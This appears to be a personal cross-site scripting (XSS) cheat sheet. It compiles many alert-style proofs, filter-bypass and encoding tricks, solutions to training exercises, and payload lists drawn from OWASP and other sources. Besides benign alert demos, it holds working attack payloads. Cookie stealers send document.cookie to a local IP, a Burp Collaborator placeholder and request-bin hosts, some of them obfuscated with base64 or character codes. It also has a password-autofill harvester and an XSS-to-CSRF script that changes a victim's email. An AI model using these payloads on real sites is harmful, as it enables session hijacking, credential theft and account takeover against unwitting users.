Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
al+ert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
top['alert'](document.domain);
top[8680439..toString(30)](document.domain);
top[/alert/.source](document.domain);
alert(this['document']['domain']);
alert(document['cookies'])
// Breaking out of the JavaScript context
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//
'-alert(document.domain)-'
</script><script>alert(1)</script>
// Inside event handlers
" autofocus onfocus=alert(document.domain) x="
//Inside href
<a href="javascript:alert(document.domain)">
// Inside jQuery or template expressions
${alert(document.domain)}
//AngularJS (if inside ng-app)
{{$on.constructor('alert(1)')()}}
// Indirect Invocation
alert.call(null, document.domain);
alert.apply(null, [document.domain]);
alert.bind()(document.domain);
Reflect.apply(alert, null, [document.domain]);
alert.valueOf()(document.domain);
with(document) alert(domain);
Promise.all([document.domain]).then(alert);
document.domain.replace(/.*/, alert);
// Array methods
[document.domain].find(alert);
[document.domain].findIndex(alert);
[document.domain].filter(alert);
[document.domain].every(alert);
[document.domain].forEach(alert);
// Alternate array syntax (all array methods apply)
Array(document.domain).find(alert);
Array.of(document.domain).find(alert);
(new Array(document.domain)).find(alert);
// Other Datastructure Methods
(new Map()).set(1, document.domain).forEach(alert);
(new Set([document.domain])).forEach(alert);
// Evaluated
eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='));
eval(atob(/YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=/.source));
eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59));
setTimeout`alert\u0028document.domain\u0029`;
Set.constructor`alert\x28document.domain\x29```;
(new Function('alert(document.domain)'))();
(new (Object.getPrototypeOf(async function(){}).constructor)('alert(document.domain)'))();
Function('x','alert(x)')(document.domain);
// Template Literal Expression
`${alert(document.domain)}`;
// onerror assignment
onerror=alert;throw document.domain;
onerror=eval;throw'=alert\x28document.domain\x29';
// With location.hash = #alert(document.domain)
eval(location.hash.substr(1))
// AngularJS
{{$on.constructor('alert(1)')()}}
=== Filter bypasses ===
//null byte
<[%00]img onerror=alert(1) src=x>
<img o[%00]nerror=alert(1) src=x>
<img onerror=a[%00]lert(1) src=x>
// arbitrary tag name
<x onclick=alert(1) src=a>click</x>
//Space following tag name:
<img[%09]onerror=alert(1) src=x>
<img[%0d]onerror=alert(1) src=x>
<img[%0a]onerror=alert(1) src=x>
<img/"onerror=alert(1) src=x>
<img/'onerror=alert(1) src=x>
<img/anyjunk/onerror=alert(1) src=x>
<img/onerror="alert(1)"src=x>
//HTML encoding
<img onerror=a&#x6c;ert(1) src=x>
<img onerror=a&#108;ert(1) src=x>
//unicode encoding
%u00AB <<
%u00BB >>
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
// JavaScript escaping
\u006c <=> l
//weird syntax
<script<{alert(1)}/></script>
// UTF-7
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
// Two inputs, placeholder with a multi-byte character
input1: [%f0]
input2: "onload=alert(1);
//COOKIE STEALER
<script>new Image().src="http://192.168.1.110:1234/a.php?cookie="+encodeURI(document.cookie);</script>
<script>
fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
// Abuse the browser's saved-password autofill
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
//XSS for CSRF
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email', true);
changeReq.send('csrf='+token+'&[email protected]')
};
</script>
================================================================================================
XSS Elearn exercises:
Solutions
XSS 1
<script>alert('l33t')</script>
XSS 2
<script <script>>alert('l33t')</script>
XSS 3
<svg/onload=alert('l33t')>
XSS 4
<svg><script>alert('l33t')
XSS 5
<svg><script>alert&lpar;'l33t'&rpar;
XSS 6
<script>\u0061lert('l33t')</script>
XSS 7
<script>eval('\x61lert(\'l33t\')')</script>
XSS 8
[NL]eval('\x61lert(\'l33t\')'
XSS 9
[\u2028]eval('\x61lert(\'l33t\')'
XSS 10
<script>eval(8680439..toString(30))(983801..toString(36))</script>
XSS 11
http://11.xss.labs%[email protected]/x.js
=========FILTER BYPASS===================
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<button onmouseover=a=String.fromCharCode(97,108,101,114,116,40,49,41),a.replace(/.+/,eval) onclick="myFunction()">Try it</button>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
===========================================EXTRA XSS PAYLOADS=====================================
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
REGULAR
***Weird input***
<>?:@~!£$%^&*|\`'"{}[]()
\0 \b \t \n \v \f \r \e
<"" '><script>\x3C\u003c\u003e\u003C%3C&lt&lt;&LT&LT;&#60;alert(1);<script>prompt.call`${1}`</script>U+0022 &#34;
%c0%bcscript%c0%bd => UTF-7
&lgt;%00script>
<scrscriptipt>
&#34; => double quote encoded
U+0022 => double quote encoded
MISC double quotes
U+201D, U+201C, U+201E, U+201F, U+2E42, U+301D, U+301E, U+2033, U+301F, U+FF02
&#8220; and &#8221;
==Common==
alert(/xss/.source) # without quotes
window[/alert/.source](8) # without quotes
<input type="button" onmouseup="alert('XSS')"/>
<input type="button" oncliconcliconcliconcliconclickkkkk="alert('XSS')"/>
<body onload=alert(1)>
<img src=1 onerror=alert(1)>
<img/src="1>" onerror="alert(1)">
<svg onload=alert(1)>
<x onmouseover=alert(1)>
<iframe src=javascript:alert(1)>
<object data=javascript:alert(1)>
<script>eval.call`${'prompt\x281)'}`</script> =>no equal sign or double quote
<script>prompt.call`${1}`</script> => no () or =
>'>"><img src=x onerror=alert(0)>
javascript:alert(0)
data:text/html,<script>alert(0)</script>
"-alert(0)-"
";alert(0);//
'-alert(0)-'
"+alert(0)+"
");alert(0);//
<input onfocus=alert(0) autofocus>
"onmouseenter=confirm(1)>
<base href=//1dn.eu/a.js>
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
<a onmouseover="alert(1)" href="#">read this!</a>
<p <script>alert(1)</script>hello
</td <script>alert(1)</script>hello
<a%20href="data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg==">click%20me</a>
abc\'%window["alert"](9)//
abc\'window[String.fromCharCode(0x61,0x6c,0x65,0x72,0x74)](9)//
[(1,alert)(1)]
CSS based
<p style="font-family:'foo\27\3bxss:(alert(1))/*'">
<p style="filter: 'expression(alert(1))'">
<~/XSS STYLE=xss:expression(alert('XSS'))>
"><XSS STYLE="xss:expression(alert('XSS'))
</a style="xss:express/**/ion(alert('XSS'))">
JSFUCK => alert(1)
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
polyglot (desperate man)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
JSON
"}} )%3balert(1)%3b//
Playing with the URI structure
http://www.example.com/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login .
http://testsite.test/<script>alert("TEST");</script>
JavaScript:alert(document.cookies);
Vbscript:MsgBox()
<INPUT type= "text" style= "font-family:e/**/xpression(alert('Hello'))">
"onclick=javascript:alert() x="
<script src=http://1dn.eu/a.js></script>
<A HREF="http://1dn.eu/a.js"> XSS</A>
AUTOFOCUS onfocus=alert(1)>
<input type="text" AUTOFOCUS onfocus=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<script src=http://1dn.eu/a.js></script>
<SCRIPT a=">" SRC="http://1dn.eu/a.js"></SCRIPT>
<SCRIPT ="blah" SRC="http://1dn.eu/a.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="http://1dn.eu/a.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://1dn.eu/a.js"></SCRIPT>
<SCRIPT a='>' SRC="http://1dn.eu/a.js"></SCRIPT>
"><XSS STYLE="xss:expression(alert('XSS'))
</a style="xss:express/**/ion(alert('XSS'))">
eval(alert(1));
<%00SCRIPT>alert('Vulnerable')</SCRIPT>
<%0dSCRIPT>alert('Vulnerable')</SCRIPT>
<~/XSS STYLE=xss:expression(alert('XSS'))>
{}*{xss:expression(open(alert(1)))} => CSS selector for use in a relative path overwrite (RPO) stylesheet, which breaks when a trailing / is added
javascript://google.com/?x=%0Aalert`Hello!`
#overlong UTF-8
<\x08script>alert(1)</script>
<\xFC\x80\x80\x80\x81\xA9\xFC\x80\x80\x80\x81\xAD\xFC\x80\x80\x80\x81\xA7 src='' onerror=alert(2) />
<\xFC\x80\x80\x80\x81\xA9mg src='' onerror=alert(2) />
"\xC1\xA9mg src='' onerror=alert(3) />
"\xF8\x80\x80\x81\xA9mg src='' onerror=alert(3) />
#hex HTML entities
<* BODY ONLOAD=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;&#x3B;>
<* input type="image" src="http://aaaa/" onerror="x="'aler';x+="'t(\'Arian_i5_0wN3d!!1\')';eval(x);">
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://1dn.eu/a.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://1dn.eu/a.js"></SCRIPT>
</script><svg '//" onload=alert(1)//
</script><svg onload='-/"/-alert(1)//'
</script><+svg/o+nload=al+ert(1)>
<svg+o<scriptnload=alert(1)
<x/x=&{eval(name)};
<svg/onload=eval(name)
"><svg/onload=prompt(1)>
javascript://google.com/?x=%0Aalert`Hello!`
JQUERY
'>").on("error",function(){alert(9)});
$(":first img").each(function(k,o){o.src="x";o.onerror=alert(9)})
$(window).unload(function(){alert(9)})
$("body").html()[1] => grab '<'
$.get("http://evil.site/attack.js")
/</.source + "img" + />/.source
ANGULAR
x{{1==1}}x
Object["constructor"]("alert(1)")()
CSS injection
%0A{}*{color:red;}
%0A{}*{color:red;}/
%0A{}*{color:red;}//
%0A{}*{color:red;}///
in the URL and check whether the text turns red. To load an external stylesheet of arbitrary length, replace the *{color: red;} payload with @import url(//evil.com).
OS INJECTION
<!--#exec cmd="ls .."-->
COOKIE CATCHER
=> change the receiving address
<iframe srcdoc="%26lt%3Bimg%20src%26equals%3Bx%3Ax%20onerror%26equals%3Beval%26lpar%3Batob%26lpar%3B%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHBzOi8vd3d3LnBvdGF0b3BsYS5uZXQveHNzP2Nvb2tpZT0iK2VuY29kZVVSSShkb2N1bWVudC5jb29raWUpOw%3D%3D%27%26rpar%3B%26rpar%3B%26gt%3B
eval(unescape(String(/%2a%2a%2f%69%6d%67%3d%6e%65%77%20%49%6d%61%67%65%28%29%3b%20%69%6d%67%2e%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%72%65%71%75%65%73%74%62%2e%69%6e%2f%31%34%74%79%66%39%35%31%3f%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%2f%2a%2a/)));
<script
>
eval(String.fromCharCode(105, 109, 103, 61, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 59, 32, 105, 109, 103, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 115, 58, 47, 47, 114, 101, 113, 117, 101, 115, 116, 98, 46, 105, 110, 47, 49, 52, 116, 121, 102, 57, 53, 49, 63, 39, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59));
<,/script
>
EVADE FILTERS
<img/src="mars.png"alt="mars">
<object><param name="src" value="javascript:alert(0)"></param></object>
<object data="javascript:alert(0)">
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image>
<img src=x:alert(alt) onerror=eval(src) alt=0>
XHTML
<x:script xmlns:x="http://www.w3.org/1999/
xhtml">alert('xss');</x:script>
MISC
location='javascript:alert(0)';
Object["constructor"]("alert(1)")()
name=window.name
location=name
In Firefox, you can use the hash symbol as a sharp variable, #0={}
http://victim.com/?param=";location=location.hash)//#0={};alert(0)
To access document.cookie:
alert(document['cookie'])
with(document)alert(cookie)
REFERER CONTROLLED
eval(document.referrer.slice(10));
Use a ternary operator along with fake GET parameters, e.g.
0?fake1=1/*&id=42&name=";eval(1+location.string);"&lang=EN&fake2=*/:alert(0)
x setter=eval,x=1 => still needs investigation into how it works
http://site.com/?p=";eval(unescape(location))//#
%0Aalert(0)
""+{toString:alert}
""+{valueOf:alert}
OBFUSCATOR
-obfuscator
-encoder
-jjencode
-aaencode
-jsfuck.com
http://www.slideshare.net/hasegawayosuke
CREATE a FORM FROM XSS
https://secure.pay.com/#/login?message=<script%09>alert("XSS");var f = document.createElement("form");f.setAttribute('method',"post");f.setAttribute('action',"submit.php");var i = document.createElement("input");i.setAttribute('type',"text");i.setAttribute('name',"username");var s = document.createElement("input");s.setAttribute('type',"submit");s.setAttribute('value',"Submit");f.appendChild(i);f.appendChild(s);document.getElementsByTagName('body')[0].appendChild(f);
EXTRACT < > when they are encoded, using jQuery
https://secure.pay.com/#/login?message=<script>alert($("body").html()[0])
References for more complicated stuff
http://www.slideshare.net/BruteLogic/building-advanced-xss-vectors
http://www.securitysift.com/quotes-and-xss-planning-your-escape/
http://www.slideshare.net/hasegawayosuke
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20BlackHat%20US%202009%20favorite%20XSS%20Filters-IDS%20and%20how%20to%20attack%20them.pdf
http://polyglot.innerht.ml/
https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#level-1
http://blog.portswigger.net/2017/09/abusing-javascript-frameworks-to-bypass.html
===========================================MISC=====================================
XSS
stealing the session cookie;
inducing user actions;
injecting Trojan functionality;
stealing cached autocomplete data; and
logging keystrokes.
deface it,
steal user's form values
redirect as part of a phishing attack
look at cookies
try to send malware through a drive-by download attack
%c0%af => percent-encoded overlong UTF-8 sequence
https://www.branah.com/unicode-converter
=== Encoding Bypass ===
Ways to represent the "less than" character <
•0x3C
•0xC0 0xBC
•0xE0 0x80 0xBC
•0xF0 0x80 0x80 0xBC
\x3c\x3C\u003c\u003C<z1%3Cz2%253Cz3%uff1cz4\x3cz5\u003cz6%u00ABz7+ADw-z8<<z9«z10%u003cz11%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060
<
%3C
&lt
&lt;
&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060
\x3c
\x3C
\u003c
\u003C
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
%uff1C
%uff1E
U+000A LINE FEED (LF) and U+000C FORM FEED (FF) => for multi lines input
https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#level-5
=== Bad Characters ===
<>?:@~!£$%^&*()|\'
=== try it if you are desperate ===
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3eCANARY
=== classic payload ===
<svg/onload=alert(1)>
'"</Script><Html Onmouseover=(alert)(1) //
<script>alert(1)</script>
<sCrIpt>alert(1)</ScRipt>
<<script>alert(0)</script>
<script src=http://1dn.eu/a.js></script>
<img/src="1>" onerror="alert(1)">
<img src="1" onerror="alert(1)">
<img src='1' onerror/=alert(0) />
<img/src='1'/onerror=alert(0)>
<img src='1'onerror=alert(0)>
<img src='1' onerror='alert(0)' <
<a onmouseover="alert(document.cookie)">link</a>
<body onload=alert('test1')>
<body onload=prompt(1) />
<body onload=confirm(1) />
(window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] +
(!![]+[])[1] + (!![]+[])[0]])(9)
<b onmouseover=alert('Wufff!')>click me!</b>
" onerror="alert(1)
javascript:alert(1)
j\avas\cript\:a\lert(2)
Characters tolerated as a prefix to URI schemes:
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
(payload without parenthesis or equal sign)
<script>prompt.call`${1}`</script>
(payload when parenthesis are encoded)
<svg><script>prompt&#40;1)<b>
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
</xss:xss><svg/onload=alert(1)>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
=== Template injection ===
{7+7}
{var}
${var}
{{var}}
<%var%>
[% var %]
</XSS/*-*/STYLE=xss:e/**/xpression(alert(document.cookie))>
</z/*-*/style=z:e/**/xpression(document.write('z'))>
</z/*-*/style=z:e/**/xpression(alert(1))>
</a style="background:expression(alert(1))">
=== BRUTE LOGIC PAYLOADS ===
Technique Vector/Payload *
* In URLs: & => %26 , # => %23 , + => %2B
HTML Context
Tag Injection <svg onload=alert(1)>
"><svg onload=alert(1)//
HTML Context
Inline Injection
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
Javascript Context
Code Injection
'-alert(1)-'
'-alert(1)//
Javascript Context
Code Injection
